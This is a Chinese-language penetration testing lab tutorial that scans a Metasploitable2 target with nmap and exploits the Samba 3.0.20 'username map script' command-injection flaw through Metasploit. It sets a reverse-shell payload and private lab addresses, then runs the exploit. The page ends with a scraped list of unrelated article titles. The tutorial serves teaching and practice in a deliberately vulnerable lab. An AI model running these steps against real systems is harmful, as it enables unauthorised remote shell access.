启动 Kali 容器并进入到 bash 界面里,执行 ping 操作验证网络联通性:

# 启动并进入 Kali 容器里的 bash
docker run -ti --network host 3f457 bash
# 在 Kali 容器中测试虚拟网络连接,使用 Ctrl-C 退出 ping:
ping target


在 Kali 容器的 bash 界面里运行以下命令,注意 Nmap 的参数使用:

  • -p:指定扫描的端口范围
  • -T4:设定 nmap 扫描的时间策略,数字为 0-5,越大越快。扫描的越慢则越不容易被发现,也不会给目标带来太大的网络流量
  • -A:同时启用操作系统指纹识别和版本检测
  • -v:将会显示扫描过程中的详细信息
  • /tmp/report.txt:将输出的信息重定向到文件中,方便后续对扫描信息进行分析

输出的报告可以使用 cat 命令打开查看,包含开放的服务信息,版本号,操作系统的信息等:

执行以下命令,查找扫描报告里 Samba 相关的信息:

grep -i samba /tmp/report.txt


Samba 本身是一个实现 Server Messages Block 协议提供跨平台文件共享服务的应用。

这个漏洞出现的前提是使用了 username map script 配置选项,这个选项不是默认的,但在 Metasploitable2 系统中是打开的。

漏洞出现在 Samba 处理 SAM 数据库更新用户口令的代码时,没有对代码进行严格的过滤,便把用户的所有输入信息直接传递给了 /bin/sh Shell 执行。从而当设定的用户名中有一些命令字符的时候,我们可以执行任意的系统命令。

启动 Metasploit 框架比较简单,在 Kali 中依次执行下面的命令即可:

# 启动 postgreSQL 数据库,因为 Metasploit 需要使用 postgreSQL 进行数据存储
service postgresql start
# 初始化数据库
msfdb init
# 启动 msfconsole,进入到操作界面
msfconsole



首先,告诉系统我们将要使用的攻击模块:

msf > use exploit/multi/samba/usermap_script
copy

查看攻击负荷(payload)列表,在这里 payload 用来在目标被攻陷后创建后门 Shell:

msf > show payloads


设置 payload 为 cmd/unix/reverse 类型,通过 telnet 创建远程 Shell:

msf > set payload cmd/unix/reverse
copy

查看当前的配置参数,这里会列出当前我们要使用的攻击模块和 payload 的相关参数,包括攻击的目标地址,攻击的目标端口以及后门 Shell 监听的端口号等:

msf > show options


补充设置参数,需要设置攻击目标和攻击机本地的 IP 地址,再次查看先前的扫描结果,Samba 3.0.20 监听在 445 端口上,所以我们需要修改攻击的端口号:

msf > set RHOST 192.168.122.102
msf > set LHOST 192.168.122.1
msf > set RPORT 445


设置完成后再次 show options 查看配置参数:

执行攻击比较简单,只需要输入 exploit 命令就可以了:

msf > exploit


首先在 Shell 中输入 whoami 判断当前的身份,然后查看当前的主机名:

kali渗透测试:【实验2】一次简单的渗透测试实战相关推荐

  1. 网络渗透测试实验三 XSS和SQL

    网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...

  2. 渗透测试实验一#NMAP#WinHex#Zoomeye

    渗透测试实验一 实验一 网络扫描与网络侦察 说明:红色部分无需写入实验报告.实验完成后形成实验报告电子版. 实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫 ...

  3. 网络渗透测试实验三——XSS和SQL注入

    网络渗透测试实验三--XSS和SQL注入 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计 ...

  4. 查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试

    在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...

  5. 实验吧 —— web完整渗透测试实验指导书(图片版)

    web完整渗透测试实验指导书(图片版)

  6. 基于pyBoard的进一步的一些测试实验,MC3008

    自制pyBoard的I2C实验,应用MicroPython 利用STM32F405RG制作pyBoard实验板 pyBoard 基于MicroPython开发STM32FXX单片机 pyBoard M ...

  7. ab实验置信度_为什么您的Ab测试需要置信区间

    ab实验置信度 by Aloïs Bissuel, Vincent Grosbois and Benjamin Heymann AloïsBissuel,Vincent Grosbois和Benjam ...

  8. 初次使用Pikachu漏洞平台进行测试实验

    初次使用Pikachu漏洞平台进行测试实验 初次实验具体操作 第一部分:XSS漏洞 1.pikachu平台上的反射型XSS漏洞(get) 1.pikachu平台上的反射型XSS漏洞(get). 首先测 ...

  9. 软件定义网络实验之SDN网络简单管理及开发

    目录 实验名称 实验目的 实验内容 1.结合Mininet及RYU组建SDN网络 2.基于RYU及Mininet管理网络.开发简单网络管理程序 实验步骤 1.结合Mininet及RYU组建SDN网络 ...

  10. ZYNQ之FPGA 片内ROM读写测试实验

    文章目录 前言 一.创建ROM初始化文件 二.添加ROM IP核 三.编写测试程序 四.添加ILA 五.分配管脚 六.Simulator仿真 七.硬件调试 总结 前言 FPGA本身是SRAM架构的,断 ...

最新文章

  1. Android之系统自带的文字外观设置
  2. 一些有用的Exadata诊断命令
  3. pytorch离线安装(探索尝试版本)
  4. 微软最新论文解读 | 基于预训练自然语言生成的文本摘要方法
  5. Neo4j--第一章
  6. kaggle中自己的notebook不见了
  7. 第5章 Python 数字图像处理(DIP) - 图像复原与重建4 - 指数噪声
  8. linux promisc 作用,linux 下怎樣查看網卡是否支持混雜(promisc)模式
  9. Spring Boot文档阅读笔记-how-to-implement-2-way-ssl-using-spring-boot
  10. 清华竟然开设:《摸鱼学导论》,这门课火了!
  11. 腾讯实习生招聘笔试题目
  12. 机器人编程python代码_自己动手开发智能聊天机器人完全指南(附python完整源码)...
  13. (三)java版spring cloud+spring boot 社交电子商务平台 - Spring Cloud集成项目简介
  14. 10 个超棒的 jQuery 视频插件
  15. 计算机博弈 六子棋 人机/人人对弈系统开发
  16. PSP金手指下载及使用方法和图文教程
  17. 因果推断英文书单整理及简介
  18. 机械键盘无冲测试软件,全键无冲 键盘测试 优缺点总结
  19. Grown Up Digital: How the Net Generation is Changing Your World
  20. 正则表达式(详细解析)

热门文章

  1. 安全工器具及个人防护用具使用
  2. 来自程序媛的大数据分享(文中有彩蛋)
  3. 做成绩查询系统,教你去除excel表格粘贴函数。
  4. 图书管理系统【Servlet+HTML综合应用】
  5. 一文带你走进seo,新手必须了解的seo知识你知道吗
  6. 11G Concept 第三章翻译 Indexes and Index-Organized Tables(索引和索引组织表)
  7. 微软Office办公软件哪个版本更好用?office365,office2022,2023等
  8. Python 求阶层(n的累乘、n的累加)
  9. 物联网卡流量池是什么东西?
  10. Java粉刷墙面的程序,墙面粉刷详细操作流程